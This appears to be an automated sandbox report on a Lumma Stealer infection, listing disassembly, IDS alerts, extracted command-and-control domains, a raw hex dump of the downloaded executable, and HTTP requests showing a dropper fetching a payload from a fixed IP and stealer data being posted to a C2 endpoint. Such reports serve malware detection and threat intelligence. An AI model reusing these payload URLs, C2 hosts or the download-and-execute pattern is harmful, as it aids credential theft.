Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_00989A29
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	3_2_0098EA27
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, ebx	3_2_0099E250
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov edx, ecx	3_2_009A8A77
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	3_2_009A8A77
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	3_2_009A8A77
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then test eax, eax	3_2_009A8A77
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp ecx	3_2_0097C264
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]	3_2_00984BD2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	3_2_0099B3D7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_00975BF7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebp, eax	3_2_00975BF7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, esi	3_2_009923F7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	3_2_009923F7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	3_2_009923F7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00986B2A
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	3_2_00985487
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0099DCBC
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0099CCB0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	3_2_009964DA
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	3_2_009864CA
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	3_2_00987C28
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then xor edi, edi	3_2_00987C28
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov esi, eax	3_2_00985C41
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_00999444
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	3_2_00999444
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	3_2_009AF597
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0099CD89
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00998DC8
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	3_2_009875E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	3_2_0098D5E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push esi	3_2_00997D1A
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0099CD37
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0098B547
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0099CD78
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh	3_2_00984E96
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp al, 2Eh	3_2_00996E96
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh	3_2_00984E87
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_009A56B7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_0097DE40
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ebx, eax	3_2_0097DE40
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	3_2_00998FA0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_00985FD3
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_009797E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	3_2_009797E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	3_2_009AEF07
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	3_2_00986F35
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	3_2_00986F35
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 4x nop then push 00000000h	3_2_00999F40

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:65277 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49707 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49708 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49711 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49706 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49714 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49711 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.220.223:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 12:49:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 12:45:01 GMTETag: "59e00-6298ac83d9e2c"Accept-Ranges: bytesContent-Length: 368128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 28 04 00 3c 00 00 00 00 10 42 00 f0 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 21 00 00 00 10 04 00 00 22 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 12 01 00 00 10 42 00 00 14 01 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 176.113.115.19 176.113.115.19

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 172.67.179.207:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=99VJBESCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12781Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5TJ6E56H7BJUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: rapeflowwj.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=72ERRQ127ZKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20195Host: rapeflowwj.lat

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat

Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeL
Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeQt
Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeVt
Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exedt
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: InstallSetup.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3921516572.0000000000BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEV
Source: C7B4.tmp.exe, 00000003.00000002.1819502151.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/api
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/apij
Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
